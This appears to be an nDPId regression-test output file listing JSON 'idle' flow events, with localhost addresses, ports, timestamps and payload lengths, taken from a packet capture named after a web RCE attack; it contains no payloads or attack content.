00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
